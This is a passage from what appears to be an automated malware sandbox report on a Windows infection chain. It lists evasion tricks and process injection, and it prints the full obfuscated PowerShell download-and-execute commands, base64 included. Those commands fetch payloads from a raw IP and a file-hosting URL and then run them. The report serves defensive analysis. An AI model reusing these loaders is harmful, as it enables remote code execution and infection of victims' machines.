Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3148 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6800 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 897 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7002 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 3620 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820 Thread sleep count: 3148 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820 Thread sleep count: 6800 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep time: -3600000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1976 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AE0101 rdtsc 16_2_00AE0101
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A907AC NtCreateMutant,LdrInitializeThunk, 16_2_00A907AC
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A80080 mov ecx, dword ptr fs:[00000030h] 16_2_00A80080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A800EA mov eax, dword ptr fs:[00000030h] 16_2_00A800EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AA26F8 mov eax, dword ptr fs:[00000030h] 16_2_00AA26F8
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $alastrar = 'jgvzdhjlbgvqyxigpsanahr0chm6ly8xmde2lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1ivfvhx0v5cnveujbpqvpimehisnllcfvywfn2rl9pnmo4yndlvgvxqkn1mtl4y2jquu41vgtzytrprzbncwnjcvdotgxnjnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjc5ndm1nmexzmy2yyanoyrhbwjpz3vpzgfkzsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgvudhjhzgfuagegpsakyw1iawd1awrhzguurg93bmxvywreyxrhkcrlc3ryzwxlamfyktskym9ybmvjbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrlbnryywrhbmhhktskbglxdwlkawzpy2fyid0gjzw8qkftrty0x1nuqvjupj4noyrwaw50b3jhid0gjzw8qkftrty0x0vord4+jzsky2hvdxzpcia9icrib3juzwnvlkluzgv4t2yojgxpcxvpzglmawnhcik7jgltbwvyz2lyid0gjgjvcm5ly28usw5kzxhpzigkcgludg9yysk7jgnob3v2axiglwdlidaglwfuzcakaw1tzxjnaxiglwd0icrjag91dmlyoyrjag91dmlyics9icrsaxf1awrpzmljyxiutgvuz3rooyrmcnv0awzpy2fyid0gjgltbwvyz2lyic0gjgnob3v2axi7jgj1c3nvbgnvid0gjgjvcm5ly28uu3vic3ryaw5nkcrjag91dmlylcakznj1dglmawnhcik7jhf1aw5py2egpsatam9pbiaojgj1c3nvbgnvllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcridxnzb2xjby5mzw5ndggpxtskymvpcmftzsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhf1aw5py2epoyrzywlkb3igpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrizwlyyw1lktskzw5nb3jkdxjhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlbmdvcmr1cmfylkludm9rzsgkbnvsbcwgqcgndhh0lkfsru5mrvqvmtyzlzixljmyms41ndiumjcxly86chr0accsicckzgfkyw5ljywgjyrkywrhbmunlcanjgrhzgfuzscsicdhc3buzxrfy29tcglszxinlcanjgrhzgfuzscsicckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlcckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlccxjywnjgrhzgfuzscpkts=';$morfose = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($alastrar));invoke-expression $morfose
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $alastrar = 'jgvzdhjlbgvqyxigpsanahr0chm6ly8xmde2lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1ivfvhx0v5cnveujbpqvpimehisnllcfvywfn2rl9pnmo4yndlvgvxqkn1mtl4y2jquu41vgtzytrprzbncwnjcvdotgxnjnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjc5ndm1nmexzmy2yyanoyrhbwjpz3vpzgfkzsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgvudhjhzgfuagegpsakyw1iawd1awrhzguurg93bmxvywreyxrhkcrlc3ryzwxlamfyktskym9ybmvjbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrlbnryywrhbmhhktskbglxdwlkawzpy2fyid0gjzw8qkftrty0x1nuqvjupj4noyrwaw50b3jhid0gjzw8qkftrty0x0vord4+jzsky2hvdxzpcia9icrib3juzwnvlkluzgv4t2yojgxpcxvpzglmawnhcik7jgltbwvyz2lyid0gjgjvcm5ly28usw5kzxhpzigkcgludg9yysk7jgnob3v2axiglwdlidaglwfuzcakaw1tzxjnaxiglwd0icrjag91dmlyoyrjag91dmlyics9icrsaxf1awrpzmljyxiutgvuz3rooyrmcnv0awzpy2fyid0gjgltbwvyz2lyic0gjgnob3v2axi7jgj1c3nvbgnvid0gjgjvcm5ly28uu3vic3ryaw5nkcrjag91dmlylcakznj1dglmawnhcik7jhf1aw5py2egpsatam9pbiaojgj1c3nvbgnvllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcridxnzb2xjby5mzw5ndggpxtskymvpcmftzsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhf1aw5py2epoyrzywlkb3igpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrizwlyyw1lktskzw5nb3jkdxjhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlbmdvcmr1cmfylkludm9rzsgkbnvsbcwgqcgndhh0lkfsru5mrvqvmtyzlzixljmyms41ndiumjcxly86chr0accsicckzgfkyw5ljywgjyrkywrhbmunlcanjgrhzgfuzscsicdhc3buzxrfy29tcglszxinlcanjgrhzgf